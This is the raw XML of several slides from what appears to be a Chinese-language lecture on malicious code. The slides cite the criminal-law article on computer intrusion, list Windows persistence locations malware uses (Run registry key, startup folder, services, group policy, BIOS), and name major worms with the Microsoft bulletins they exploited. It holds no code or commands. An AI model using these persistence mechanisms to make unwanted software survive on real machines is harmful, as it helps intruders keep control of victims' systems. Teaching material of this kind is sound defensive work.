          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1981200"/>
            <a:ext cx="7620000" cy="2239963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>第二百八十五条违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>三年以下有期徒刑或者拘役</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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24501A3-E0D2-46D4-B405-9F7048834476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0"/>
              <a:t>恶意代码自动运行机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E2B392-7C5C-45BD-83B3-23AA8267EC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="1676400"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用操作系统或硬件运行机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>组策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：“本地计算机策略”→“计算机配置”→“管理模块”→“系统”→“登录”，在右侧窗体双击“在用户登录时运行这些程序”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：将自身注册为系统服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>注册表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16734532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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31">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1">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31">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1">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="17"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EF93431-9D2E-42F3-9ED4-0AD1C38D4A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0"/>
              <a:t>恶意代码自动运行机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131075" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F04D6D0-958C-47D5-A11E-5F527E95FE34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="1676400"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用操作系统或硬件运行机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>快速启动目录：​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统有自带的快速启动的文件夹。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>徽标键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>+ R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>，键入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>shell:startup”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：先于操作系统而启动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156972751"/>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5FD79FD7-57DE-4876-857D-82B04A16CCDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年以来的重大蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4957178C-362B-44E3-BCCA-24F80E538419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="1676400"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>蠕虫王</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-slammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MS02-039</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>冲击波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-msblast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS03-026</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>震荡波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-sasser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS04-011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>极速波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-Zotob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS05-039</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>魔波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-MocBot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日 ）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS06-040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>扫荡波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>-saodangbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>日）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS08-067</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>月被普遍捕获）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>MS10-046(lnk) , MS08-067 , MS10-061</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>个操作系统漏洞及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>个西门子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>wincc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>系统漏洞</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animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">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47107">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">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animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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47107">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">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animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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47107">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">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47107">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>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47107">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>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47107">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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7107">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47107">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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47107">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
